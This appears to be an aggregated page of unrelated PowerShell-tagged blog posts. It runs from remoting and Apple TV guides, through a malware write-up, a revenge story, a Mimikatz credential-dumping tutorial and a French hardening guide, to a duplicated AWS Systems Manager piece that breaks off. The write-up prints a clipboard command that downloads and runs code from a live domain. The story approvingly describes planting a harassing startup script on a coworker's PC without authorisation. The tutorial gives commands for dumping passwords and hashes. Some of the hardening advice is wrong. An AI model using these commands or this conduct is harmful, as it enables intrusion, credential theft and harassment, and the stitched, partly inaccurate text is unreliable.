Enter-PSsession: Run PowerShell Remote Commands

Enter-PSsession: Run PowerShell Remote Commands @vexpert #vmwarecommunities #100daysofhomelab #homelab #PowerShellRemotingBasics #EnterPSSessionCommands #PowerShellRemoteServer #RemoteSystemManagement #WindowsServerPowerShell #NewPSSessionUsage

Windows PowerShell has changed how we manage our Windows Server environments. One of the powerful features of PowerShell is PowerShell remoting, which enables the execution of PowerShell commands or scripts on a remote computer. The Enter-PSSession command, a core part of PowerShell remoting, allows us to establish an interactive session with a remote system, fundamentally changing how we…

View On WordPress

How to find your Apple TV's IPv6 address(es)

Since Apple TV's network settings don't list IPv6 info, it's time to get creative, though it won't be the hardest tech guide out there. Typically it has 2 IPv6 addresses: 1 public, and 1 private (The latter of which is used within the home's router network).

————————————————

Public IPv6 address

Download https://apps.apple.com/app/icurlhttp-appletv/id1153384808 (iCurlHTTP AppleTV)

2) Open that app. 3) In its "Browser" settings in the lower left, change from "User" to "iPhone". This is required. 4) In its address field in the upper left, write "https://ip.me". Then press the remote's OK button. 5) If it works, a row will show up a slight bit down in the text results that say "<p class="ip-address">" followed by your Apple TV's public IP.

————————————————

Private IPv6 address (i.e. within your router's LAN)

Download https://apps.apple.com/us/app/vlc-media-player/id650377962 (VLC for Apple TV)

2) Open that app. 3) Go to "Remote Playback" → Click "Turn On Remote Playback" if it hasn't already been turned on. 4) The app will show a URL that it tells users to open on a non-"Apple TV device". It will usually be "http://(The Apple TV's network name in lowercase with dashes).local" Ensure that the VLC app remains on that screen throughout the entire rest of the guide. 5) On a Windows, macOS, or Linux device (Android won't work), open any sort of command line (PowerShell, Cygwin, Windows Terminal, Command Prompt, Mac Terminal, Bash, ZSH, anything you can think of like those). It is not needed to run as administrator, though nothing bad happens if you do.

6) Type "ping (the URL from step 4 but without the http:// part)", then press Enter.

7) If it works, the result will show "Pinging (URL) [(The private IP address)] with 32 bytes of data:" 8) That IP (Remove the last "%(2 numbers)" part first) can then be pasted into a browser, "http://[(The IP)]". The square brackets are required. 9) If the browser loads a "Drop files" window, then the IP works correctly.

Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers. The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days. Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.

As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard. Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.

instructions to infect your own device If you’re using Chrome, you may see this warning:

Chrome issues a warning but it may the danger may be unclear to users The warning is nice, but it’s not very clear what this warning is for, in my opinion. Users of Malwarebytes’ Browser Guard will see this warning:

Malwarebytes Browser Guard’s clipboard warning “Hey, did you just copy something? Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.” Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow. What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger. pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v" The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is: powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv" The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase Suspicious Content at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves. Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT. Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT. The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.

IOCs The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones. (booking.)chargesguestescenter[.]com (booking.)badgustrewivers.com[.]com (booking.)property-paids[.]com (booking.)rewiewqproperty[.]com (booking.)extranet-listing[.]com (booking.)guestsalerts[.]com (booking.)gustescharge[.]com kvhandelregis[.]com patheer-moreinfo[.]com guestalerthelp[.]com rewiewwselect[.]com hekpaharma[.]com bkngnet[.]com partnervrft[.]com

Malwarebytes blocks the download from bkngnet[.]com How to stay safe There are a few things you can do to protect yourself from falling victim to these and similar methods: Do not follow instructions provided by a website you visited without thinking it through. Use an active anti-malware solution that blocks malicious websites and scripts. Use a browser extension that blocks malicious domains and scams. Disable JavaScript in your browser before visiting unknown websites. The clipboard access is triggered by a JavaScript function document.execCommand(‘copy’). Disabling JavaScript will stop that from happening, but it has the disadvantage that it will break many websites that you visit regularly. What I do is use different browsers for different purposes.

Living Up to my Persona

I make a big thing about being a spirit of chaos bottled up in failing human meat, but the thing is, operating in civil society means keeping your limiters and blinkers on, so to speak. I don't exactly get to go ham on the occasional dealership's bigots or douchebags, but when I do...

See, Walt's the verbal type. Sarah's the snippy one when it comes to defending the polycule and me? Well, I know I'd fold in two with a stiff breeze. I can't punch up to save my life, my meatware decides that stammering is extra cool when it comes to actually giving lip to someone when I'm not hiding behind a headset - so I attack the best way I can: using tech to do my dirty work.

A few weeks into our company's existence, I'm doing in-person work at a dealership whose staff I utterly loathe for how contemptuous they are for their own client base and for all external collaborators (the constructor's name obviously ends with a "Benz"), and one of the Sales reps lands just one too many biphobic and discriminatory comments concerning my disability. So, using SSH, I term into his desktop while working on their central database, and drop the following into a custom BAT file I hide in the depths of Windows' System32 folder:

(at)echo off

:: Generate a random number between 1 and 100

set /a X=%random% * 100 / 32768 + 1

:: Use PowerShell to display a message box with the random number

powershell -Command "Add-Type -AssemblyName PresentationFramework;[System.Windows.MessageBox]::Show('Hey, Mike! Looks like you did %X% pushups today! Nice job!', 'Pushup Tracker')"

exit

A few more keystrokes in Windows' Run program gets me access to the Startup folder (God bless Admin rights) and I set my BAT file to run with every Windows boot-up sequence. Mike, in this case, knows as much about Windows' architecture as your average fruit fly.

He will never find my little gift, and will drive their own swamped and chronically non-available Level 1 tech absolutely fucking bugnuts, as per later testimonies. As, after all, it's just a Batch file - not a virus. From their end of things, everything is copacetic.

Fast-forward a few months, and being hounded by a mocking Windows message window seems to be enough for Mike to go from a self-obsessed would-be Sigma to a snivelling little runt who puffs up in front of customers but who realizes he's entirely dependent on us to meet his Sales targets...

And Walt knows I like it like that. I smile, nod, wave off Mike's earlier homophobia - but if I wanted? I could access that BAT file and make it much, much more malicious.

I might remove it remotely in a few months. It's been long enough as it is - but I want to be sure. Wouldn't want Mikey to get an excessive surge of homophobic self-confidence again...

Gaining Windows Credentialed Access Using Mimikatz and WCE

Prerequisites & Requirements

In order to follow along with the tools and techniques utilized in this document, you will need to use one of the following offensive Linux distributions:

Kali Linux

Parrot OS

The following is a list of recommended technical prerequisites that you will need in order to get the most out of this course:

Familiarity with Linux system administration.

Familiarity with Windows.

Functional knowledge of TCP/IP.

Familiarity with penetration testing concepts and life-cycle.

Note: The techniques and tools utilized in this document were performed on Kali Linux 2021.2 Virtual Machine

MITRE ATT&CK Credential Access Techniques

Credential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include: keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.

The techniques outlined under the Credential Access tactic provide us with a clear and methodical way of extracting credentials and hashes from memory on a target system.

The following is a list of key techniques and sub techniques that we will be exploring:

Dumping SAM Database.

Extracting clear-text passwords and NTLM hashes from memory.

Dumping LSA Secrets

Scenario

Our objective is to extract credentials and hashes from memory on the target system after we have obtained an initial foothold. In this case, we will be taking a look at how to extract credentials and hashes with Mimikatz.

Note: We will be taking a look at how to use Mimikatz with Empire, however, the same techniques can also be replicated with meterpreter or other listeners as the Mimikatz syntax is universal.

Meterpreter is a Metasploit payload that provides attackers with an interactive shell that can be used to run commands, navigate the filesystem, and download or upload files to and from the target system.

Credential Access With Mimikatz

Mimikatz is a Windows post-exploitation tool written by Benjamin Delpy (@gentilkiwi). It allows for the extraction of plaintext credentials from memory, password hashes from local SAM/NTDS.dit databases, advanced Kerberos functionality, and more.

The SAM (Security Account Manager) database, is a database file on Windows systems that stores user’s passwords and can be used to authenticate users both locally and remotely. 

The Mimikatz codebase is located at https://github.com/gentilkiwi/mimikatz/, and there is also an expanded wiki at https://github.com/gentilkiwi/mimikatz/wiki . 

In order to extract cleartext passwords and hashes from memory on a target system, we will need an Empire agent with elevated privileges.

Extracting Cleartext Passwords & Hashes From Memory

Empire uses an adapted version of PowerSploit’s Invoke-Mimikatz function written by Joseph Bialek to execute Mimikatz functionality in PowerShell without touching disk.

PowerSploit is a collection of PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 

Empire can take advantage of nearly all Mimikatz functionality through PowerSploit’s Invoke-Mimikatz module.

We can invoke the Mimikatz prompt on the target agent by following the procedures outlined below.

The first step in the process involves interacting with your high integrity agent, this can be done by running the following command in the Empire client:

interact <AGENT-ID>/<NAME>

The next step is to Invoke Mimikatz on the Agent shell, this can be done by running the following command:

mimikatz

This will invoke Mimikatz on the target system and you should be able to interact with the Mimikatz prompt.

Before we take a look at how to dump cleartext credentials from memory with Mimikatz, you should confirm that you have the required privileges to take advantage of the various Mimikaz features, this can be done by running the following command in the Mimikatz prompt:

mimikatz # privilege::debug

If you have the correct privileges you should receive the message “Privilege ‘20’ OK” as shown in the following screenshot.

We can now extract cleartext passwords from memory with Mimikatz by running the following command in the Mimikatz prompt:

mimikatz # sekurlsa::logonpasswords

If successful, Mimikatz will output a list of cleartext passwords for user accounts and service accounts as shown in the following screenshot.

In this scenario, we were able to obtain the cleartext password for the Administrator user as well as the NTLM hash.

NTLM is the default hash format used by Windows to store passwords.

Dumping SAM Database

We can also dump the contents of the SAM (Security Account Manager) database with Mimikatz, this process will also require an Agent with administrative privileges.

The Security Account Manager (SAM) is a database file used on modern Windows systems and is used to store user account passwords. It can be used to authenticate local and remote users. 

We can dump the contents of the SAM database on the target system by running the following command in the Mimikatz prompt:

mimikatz # lsadump::sam

If successful Mimikatz will output the contents of the SAM database as shown in the following screenshot.

As highlighted in the previous screenshot, the SAM database contains the user accounts and their respective NTLM hashes.

LSA Secrets

Mimikatz also has the ability to dump LSA Secrets, LSA secrets is a storage location used by the Local Security Authority (LSA) on Windows.

You can learn more about LSA and how it works here: https://networkencyclopedia.com/local-security-authority-lsa/

The purpose of the Local Security Authority is to manage a system’s local security policy, as a result, it will typically store data pertaining to user accounts such as user logins, authentication of users, and their LSA secrets, among other things. It is to be noted that this technique also requires an Agent with elevated privileges.

We can dump LSA Secrets on the target system by running the following command in the Mimikatz prompt:

mimikatz # lsadump::secrets

If successful Mimikatz will output the LSA Secrets on the target system as shown in the following screenshot.

So far, we have been able to extract both cleartext credentials as well as NTLM hashes for all the user and service accounts on the system. These credentials and hashes will come in handy when we will be exploring lateral movement techniques and how we can legitimately authenticate with the target system with the credentials and hashes we have been able to extract.

Ne laissez pas Remcos RAT pirater votre PC Windows via PowerShell

Si vous utilisez Windows, faites attention au cheval de Troie Remcos RAT. Ce virus se cache dans des e-mails de phishing avec des fichiers ZIP dangereux. Vous n’avez rien à télécharger, il suffit de cliquer sur le fichier pour que le malware démarre tout seul grâce à PowerShell, sans laisser de trace. Une fois dedans, il peut voir tout ce que vous tapez, prendre des photos de votre écran, et même contrôler votre ordinateur à distance, comme s’il était devant vous. Aujourd'hui, je vais vous expliquer comment protéger PowerShell pour éviter que Remcos RAT ou d’autres virus similaires ne prennent le contrôle de votre PC. C’est quoi Remcos RAT, et pourquoi c’est dangereux ? Remcos RAT est un logiciel espion utilisé par des hackers. "RAT" signifie Remote Access Trojan, ou cheval de Troie d'accès à distance. Une fois installé, ce logiciel donne à un hacker le contrôle total de votre ordinateur, sans que vous vous en rendiez compte. Ce qu’il peut faire : Voir tout ce que vous tapez (y compris vos mots de passe). Prendre des captures d’écran de ce que vous regardez. Ouvrir et manipuler vos fichiers. Contrôler votre ordinateur à distance. Et le pire ? Il n’installe rien sur le disque dur. Tout se passe dans la mémoire, ce qui rend le virus invisible pour votre antivirus. Comment Remcos RAT peut pirater votre PC ? Vous recevez un e-mail qui semble légitime (par exemple, une facture ou un document d’entreprise). Ce mail contient un fichier ZIP à ouvrir. Dans ce ZIP, il y a un fichier LNK (un raccourci Windows) déguisé en document. Quand vous l’ouvrez, ce fichier exécute un programme caché (mshta.exe) qui lance un script PowerShell malveillant. Ce script ne s’enregistre pas sur votre disque dur. Il agit en mémoire, ce qui le rend difficile à détecter. Et comme c’est furtif, Microsoft Defender ne réagit pas. Les hackers se connectent ensuite à distance via un serveur mal sécurisé. Bref, c’est rapide, discret… et très dangereux. PowerShell, c’est quoi exactement ? Maintenant que vous savez comment Remcos RAT s’infiltre (via un simple clic sur un faux fichier), il est temps de fermer la porte qu’il utilise pour agir : PowerShell. PowerShell, c’est un outil puissant intégré à Windows. Il sert à automatiser des tâches comme l’installation de programmes, la gestion des fichiers ou la configuration du système. Les informaticiens l’adorent, car il peut presque tout faire. Mais cette puissance a un prix : les hackers l’utilisent aussi pour contrôler un ordinateur sans être détectés. C’est justement ce que fait Remcos RAT. Comment sécuriser PowerShell ? Par défaut, PowerShell permet d’exécuter des scripts (des petits programmes) sans trop de restrictions. Et c’est là que Remcos frappe : il envoie un script caché qui se lance sans que vous ne voyiez rien. Mais rassurez-vous, en quelques commandes, vous pouvez rendre PowerShell beaucoup plus sûr, sans le désactiver complètement. Étape 1 : vérifier le niveau de sécurité actuel Ouvrez le menu Démarrer, tapez PowerShell. Faites un clic droit sur "Windows PowerShell", puis sélectionnez "Exécuter en tant qu’administrateur". Dans la fenêtre bleue qui s’ouvre, tapez cette commande : Get-ExecutionPolicy Cette commande vous indique à quel point PowerShell autorise les scripts. Si la réponse est Unrestricted, RemoteSigned, ou Bypass : vous êtes vulnérable. Étape 2 : bloquer les scripts non autorisés Pour emp��cher Remcos (et d’autres malwares) de lancer leurs scripts, tapez cette commande : Set-ExecutionPolicy Restricted Appuyez sur A, puis Entrée pour confirmer. Ce que ça fait : PowerShell ne pourra plus exécuter de scripts automatiques non approuvés. C’est une barrière simple mais très efficace.  Étape 3 : activer le mode de langage contraint Même si un script passe, on peut limiter ce qu’il a le droit de faire. C’est le ConstrainedLanguage Mode, ou mode de langage contraint. Dans PowerShell (toujours en admin), tapez : $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"

Et pour que ce réglage soit permanent sur tout le système : Set-ExecutionPolicy -Scope LocalMachine -ExecutionPolicy Restricted -Force Résultat : les fonctions puissantes (celles que les hackers aiment utiliser) sont désactivées, mais vous gardez l’usage de base pour les besoins quotidiens. Étape 4 : bloquer certaines commandes dangereuses Les hackers utilisent souvent des options spéciales pour lancer PowerShell en toute discrétion. Protégez votre système en activant un filtre de commandes : New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell" -Name "CommandLineFiltering" -Force Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\CommandLineFiltering" -Name "EnableCommandLineFiltering" -Value 1 Cela permet à Windows de reconnaître et bloquer les tentatives suspectes. Étape 5 : désactiver mshta.exe mshta.exe est un petit programme Windows qui sert à lancer des fichiers HTML avec des scripts. C’est un outil légitime, mais malheureusement, les pirates l’utilisent souvent pour exécuter discrètement leur code malveillant, comme le cheval de Troie Remcos RAT. En bloquant mshta.exe, vous empêchez ces attaques de se servir de ce moyen pour infecter votre ordinateur sans que vous le remarquiez. Pour le désactiver sur Windows 11 Pro, tapez gpedit.msc dans la barre de recherche pour ouvrir l’éditeur de stratégie de groupe. Ensuite, allez dans : Configuration ordinateur > Paramètres Windows > Paramètres de sécurité > Stratégies de restriction logicielle. Créez une nouvelle règle de chemin pointant vers C:\Windows\System32\mshta.exe et choisissez l’option Interdit. Cela empêchera mshta.exe de s’exécuter et renforcera la sécurité de votre PC. Si vous êtes sur Windows 10/11 Famille : Ouvrez Sécurité Windows > Contrôle des applications et du navigateur. Cliquez sur Paramètres de protection contre les exploits > Paramètres du programme. Cliquez sur Ajouter un programme > Choisir le chemin exact du fichier, puis sélectionnez mshta.exe. Désactivez toutes les protections associées.

“How to Restrict Server Access for Teams Using RHosting’s Custom Controls”

When managing a shared server environment, not every team member needs full access. Whether it’s for security, compliance, or operational clarity, restricting access based on roles is essential. That’s why RHosting offers powerful custom control features — so you can manage exactly who can access what, and how.

In this guide, we’ll show you how to use RHosting’s built-in controls to restrict server access for teams — without complex IT configurations or third-party tools.

🔐 Why Access Restrictions Matter

Unrestricted access increases the risk of:

Accidental file deletions or edits

Unauthorized use of sensitive applications

Data breaches or compliance violations

Confusion and clutter for end users

With RHosting’s granular access settings, you can provide the right level of access to every user — and nothing more.

🛠️ Step-by-Step: How to Restrict Access Using RHosting’s Custom Controls

Step 1: Log in to the RHosting Admin Portal

Access the RHosting Admin Dashboard using your credentials. From here, you’ll manage users, permissions, and server settings.

Step 2: Create or Select a User Group

If you're managing a team:

Navigate to User Groups

Create a new group (e.g., “Finance Team”, “Dev Interns”, “HR”)

Or, select an existing group to edit

Grouping users by role or department simplifies future management.

Step 3: Assign Server Access Controls

Within the group settings:

Choose which servers the group can access

Select folders or drives available to the group (e.g., restrict “Finance” from accessing “Dev”)

Set time-based access if needed (e.g., office hours only)

Step 4: Set Application-Level Restrictions (Optional)

RHosting also lets you control which applications are visible and usable by each user or group.

Allow only necessary apps like Tally, Excel, or custom software

Block access to tools unrelated to the user’s role

Prevent command-line or admin-level tools from being launched

Step 5: Enable Session Monitoring & Logs

Activate activity logging for transparency and compliance:

See login times, session durations, and accessed resources

Export logs for audits or internal reviews

Identify unusual behavior or access patterns

🔄 Real-World Example: Restricting Access for Interns

Let’s say your dev team hires interns for a 3-month period. Using RHosting:

Create an “Interns” group

Give them access to a specific development server only

Block access to client databases or financial systems

Restrict usage of PowerShell or admin tools

Auto-disable access after 90 days

This keeps your systems secure while enabling interns to contribute productively.

✅ Benefits of Using RHosting’s Custom Controls

Enhanced security for sensitive data and critical systems

Simplified user management for IT teams

Tailored access that matches your organizational structure

Peace of mind knowing every user has just the access they need

🚀 Take Full Control of Your Remote Environment

RHosting’s custom access controls are designed to give you precision, flexibility, and confidence in how your team interacts with remote servers.

Whether you’re onboarding new employees, managing contractors, or supporting multiple departments — you’re in control.

Boosting Efficiency in Legal Tech: Exploring iManage PowerShell, News, Records, Law Firms & Work

In today's fast-paced legal environment, law firms are turning to smarter, more integrated solutions to manage documents, ensure compliance, and streamline operations. One of the leading platforms transforming the legal tech landscape is iManage. From automation via iManage PowerShell to its impact on records management and productivity tools like iManage Work, the iManage ecosystem empowers legal professionals to work smarter and safer.

If you're a legal organization looking to optimize your document and email management processes, MacroAgility Inc. offers comprehensive consulting and implementation services tailored to iManage’s full suite of products.

iManage PowerShell: Automate with Precision

iManage PowerShell is a game-changer for IT administrators managing the iManage environment. This command-line interface tool allows for bulk operations, custom scripting, and automation of routine tasks. Whether you're onboarding new users, updating security policies, or managing workspaces, iManage PowerShell ensures tasks are executed efficiently and accurately—minimizing manual errors and saving valuable time.

MacroAgility Inc. helps firms deploy and optimize PowerShell scripts tailored to their specific iManage environment, ensuring seamless integration with existing workflows.

iManage News: Staying Ahead in Legal Tech

Staying updated with the latest iManage news is crucial for law firms striving to remain competitive. Recent updates include enhanced AI-driven search capabilities, expanded cloud functionality, and improved security compliance for hybrid workforces. These updates are especially relevant in the post-pandemic era, where remote collaboration and data security are top priorities.

MacroAgility regularly publishes news and events updates (see here) to keep clients informed about new features, updates, and best practices for getting the most out of their iManage investment.

iManage Records: Secure and Compliant Archiving

Effective records management is not just about storage—it’s about governance, compliance, and risk mitigation. iManage Records is designed to help law firms enforce information governance policies while ensuring compliance with industry regulations such as GDPR, HIPAA, and FINRA.

By integrating iManage Records with iManage Work, organizations can automate retention schedules, classify documents correctly, and apply legal holds when necessary. MacroAgility’s experts assist firms with strategic implementation and configuration of iManage Records to maintain compliance and reduce risk.

iManage for Law Firms: Tailored Legal Solutions

Thousands of law firms worldwide use iManage to manage their documents, emails, and records with unparalleled security and ease. Whether it's a global firm or a mid-size practice, iManage helps legal teams collaborate seamlessly, work securely, and serve clients efficiently.

MacroAgility Inc. specializes in consulting services specifically tailored to the legal industry. They help law firms plan, migrate, and optimize their iManage systems—ensuring a smooth transition and maximum ROI. Their services include data migration, user training, and ongoing technical support.

iManage Work: Empowering Legal Teams

At the heart of the iManage platform is iManage Work, a document and email management system that boosts collaboration and productivity. It offers secure file storage, version control, metadata tagging, and intelligent search capabilities—everything modern legal teams need to thrive.

As a certified iManage Work Consultant, MacroAgility Inc. helps firms customize and deploy iManage Work in ways that align with unique operational needs. From cloud deployment to hybrid configurations, they provide full-spectrum support to ensure smooth, scalable adoption.

Why Choose MacroAgility Inc.?

MacroAgility Inc. is a trusted iManage consulting partner offering end-to-end services across all major iManage modules. With deep domain expertise, a client-focused approach, and a proven track record, they are the go-to choice for firms looking to modernize their document management systems.

Visit macroagilityinc.com to explore their iManage services and discover how they can help your firm harness the full power of legal technology.

Conclusion

Whether you're automating workflows with iManage PowerShell, staying informed through the latest iManage news, managing compliance with iManage Records, or enhancing productivity with iManage Work, partnering with the right consulting firm makes all the difference. MacroAgility Inc. offers the experience, tools, and personalized support needed to help your law firm thrive in the digital age.

Install Remote Server Administration Tools on Windows 11

Remote Server Administration Tools (RSAT) for Windows includes Server Manager, Microsoft Management Console (MMC) snap-ins, consoles, Windows PowerShell cmdlets and providers, and command-line tools for managing roles and features that run on Windows Server. In this guide, we shall discuss the steps to install Remote Server Administration Tools on Windows 11. Because these steps have slightly…

Discover AWS Systems Manager Cross-Account Management

What is AWS Systems Manager?

AWS Systems Manager is a solution that facilitates the management, viewing, and control of your infrastructure in multicloud, on-premises, and AWS settings.

AWS Systems Manager’s advantages

Boost visibility throughout your whole node infrastructure

A consolidated view of all the nodes across the accounts and regions of your company is offered by AWS Systems Manager. Get node information quickly, including its name, ID, installed agents, operating system information, and tags. You may find problems and act more quickly by using Amazon Q Developer to query node metadata in natural language.

Use automation to increase operational efficiency

Reduce the time and effort needed to maintain your systems by automating routine operational chores. Systems Manager eliminates the need for remote PowerShell, SSH, or bastion hosts by enabling you to safely and securely manage your nodes at scale without logging into your servers. It offers a straightforward method for automating routine operational tasks, like software and patch installations, registry modifications, and user administration, across groups of nodes.

Make node management easier at scale in any setting

Any AWS, on-premises, or multicloud environment can run the Systems Manager Agent (SSM Agent), enabling Systems Manager to offer out-of-the-box visibility and simplifying managed node maintenance. Set up diagnostics to run automatically in order to find problems with the SSM Agent. Issues with pre-defined runbooks can then be fixed. Once under control, nodes can efficiently carry out vital operational functions including remotely executing commands, starting logged sessions, and patching nodes with security updates.

Tools

You can use the entire suite of AWS Systems Manager tools to securely connect to nodes without managing bastion hosts or SSH keys, patch nodes with security updates, automate operational commands at scale, and obtain thorough fleet visibility once your nodes are managed by Systems Manager.

Use cases

Control every node you have

Gain thorough insight into your hybrid and multicloud systems, as well as your node infrastructure across Amazon Web Services accounts and regions. Rapidly detect and resolve agent problems to restore unmanaged nodes and efficiently carry out crucial operational duties, such applying security updates to nodes, starting and recording sessions, or executing operational commands.

Automate your processes

Make your computational resources available, configure them, and deploy them automatically. To address common problems like misconfigured agents, keep infrastructure up to date with SSM Agent diagnosis and remediation. Execute essential operational activities, like automatically applying fixes for applications and operating systems on a regular basis.

Increase the effectiveness of operations

Prioritize increasing operational effectiveness, cutting expenses, and growing your company. Across your hybrid and multicloud setups, AWS Systems Manager is your enterprise-grade solution for managing nodes at scale with cross-account and cross-region visibility.

Presenting a fresh AWS Systems Manager experience

AWS is presenting an enhanced version of AWS Systems Manager today, which offers the much-desired cross-account and cross-region experience for large-scale node management.

All of your managed nodes, including different kinds of infrastructure like Amazon Elastic Compute Cloud (EC2) instances, containers, virtual machines on other cloud providers, on-premise servers, and edge Internet of Things (IoT) devices, can be seen centrally with the new System Manager experience. When they are linked to Systems Manager and have the Systems Manager Agent (SSM Agent) installed, they are called “managed nodes.”

A node is referred to be a “unmanaged node” if an SSM Agent ceases operating on it for any reason, at which point Systems Manager no longer has access to it. The latest version of Systems Manager also makes it easier to find and troubleshoot unmanaged nodes. To resolve any problems and restore connectivity so they can once more be managed nodes, you may run and even schedule an automated diagnosis that gives you suggested runbooks to follow.

Amazon Q Developer, the most powerful generative AI-powered software development helper, has also been integrated with Systems Manager. Using natural language, you may ask Amazon Q Developer questions about the nodes you’ve handled. You’ll receive quick answers and links to the Systems Manager where you can take action or carry out more research.

With the new interface with Systems Manager in this edition, you can also leverage AWS Organizations to enable a delegated administrator to centrally manage nodes throughout the business.

AWS Systems Manager pricing

You can monitor and fix operational problems with all of your AWS applications and resources, including Amazon Elastic Compute Cloud (EC2), Amazon Relational Database Service (RDS), Amazon Elastic Container Service (ECS), and Amazon Elastic Kubernetes Service (EKS) instances, as well as in multicloud and hybrid environments, using the unified user interface that AWS Systems Manager offers. With AWS Systems Manager, you may begin using the benefits of the AWS Free Tier without paying a dime. No upfront obligations or minimum costs apply. There may be restrictions.

AWS Free Tier

The following functionalities of AWS Systems Manager are available to you for free as part of the AWS Free Tier. There may be restrictions.

Explorer

Enabling Explorer does not incur any further fees. There may be restrictions.

The dashboard of Explorer is populated by paid OpsCenter APIs (GetOpsSummary). These API queries will incur fees. The Export to CSV option uses an aws:executeScript action step to run an Automation document. The cost of these actions may be determined by Automation pricing.

For more details please visit the AWS systems manager pricing page.

In conclusion

Gaining visibility and control over your computing infrastructure and carrying out operational tasks at scale need the use of Systems Manager. Through a centralized dashboard, the new experience provides a centralized view of all your nodes across AWS accounts, on-premises, and multicloud environments. It also integrates Amazon Q Developer for natural language queries and allows one-click SSM Agent troubleshooting. By going to the Systems Manager panel and following the simple steps, you may activate the new experience without paying more.

What is AWS Systems Manager?

AWS Systems Manager is a solution that facilitates the management, viewing, and control of your infrastructure in multicloud, on-premises, and AWS settings.

AWS Systems Manager’s advantages

Boost visibility throughout your whole node infrastructure

A consolidated view of all the nodes across the accounts and regions of your company is offered by AWS Systems Manager. Get node information quickly, including its name, ID, installed agents, operating system information, and tags. You may find problems and act more quickly by using Amazon Q Developer to query node metadata in natural language.

Use automation to increase operational efficiency

Reduce the time and effort needed to maintain your systems by automating routine operational chores. Systems Manager eliminates the need for remote PowerShell, SSH, or bastion hosts by enabling you to safely and securely manage your nodes at scale without logging into your servers. It offers a straightforward method for automating routine operational tasks, like software and patch installations, registry modifications, and user administration, across groups of nodes.

Make node management easier at scale in any setting

Any AWS, on-premises, or multicloud environment can run the Systems Manager Agent (SSM Agent), enabling Systems Manager to offer out-of-the-box visibility and simplifying managed node maintenance. Set up diagnostics to run automatically in order to find problems with the SSM Agent. Issues with pre-defined runbooks can then be fixed. Once under control, nodes can efficiently carry out vital operational functions including remotely executing commands, starting logged sessions, and patching nodes with security updates.

Tools

You can use the entire suite of AWS Systems Manager tools to securely connect to nodes without managing bastion hosts or SSH keys, patch nodes with security updates, automate operational commands at scale, and obtain thorough fleet visibility once your nodes are managed by Systems Manager.

Use cases

Control every node you have

Gain thorough insight into your hybrid and multicloud systems, as well as your node infrastructure across Amazon Web Services accounts and regions. Rapidly detect and resolve agent problems to restore unmanaged nodes and efficiently carry out crucial operational duties, such applying security updates to nodes, starting and recording sessions, or executing operational commands.

Automate your processes

Make your computational resources available, configure them, and deploy them automatically. To address common problems like misconfigured agents, keep infrastructure up to date with SSM Agent diagnosis and remediation. Execute essential operational activities, like automatically applying fixes for applications and operating systems on a regular basis.

Increase the effectiveness of operations

Prioritize increasing operational effectiveness, cutting expenses, and growing your company. Across your hybrid and multicloud setups, AWS Systems Manager is your enterprise-grade solution for managing nodes at scale with cross-account and cross-region visibility.

Presenting a fresh AWS Systems Manager experience

AWS is presenting an enhanced version of AWS Systems Manager today, which offers the much-desired cross-account and cross-region experience for large-scale node management.

All of your managed nodes, including different kinds of infrastructure like Amazon Elastic Compute Cloud (EC2) instances, containers, virtual machines on other cloud providers, on-premise servers, and edge Internet of Things (IoT) devices, can be seen centrally with the new System Manager experience. When they are linked to Systems Manager and have the Systems Manager Agent (SSM Agent) installed, they are called “managed nodes.”

A node is referred to be a “unmanaged node” if an SSM Agent ceases operating on it for any reason, at which point Systems Manager no longer has access to it. The latest version of Systems Manager also makes it easier to find and troubleshoot unmanaged nodes. To resolve any problems and restore connectivity so they can once more be managed nodes, you may run and even schedule an automated diagnosis that gives you suggested runbooks to follow.

Amazon Q Developer, the most powerful generative AI-powered software development helper, has also been integrated with Systems Manager. Using natural language, you may ask Amazon Q Developer questions about the nodes you’ve handled. You’ll receive quick answers and links to the Systems Manager where you can take action or carry out more research.

With the new interface with Systems Manager in this edition, you can also leverage AWS Organizations to enable a delegated administrator to centrally manage nodes throughout the business.

AWS Systems Manager pricing

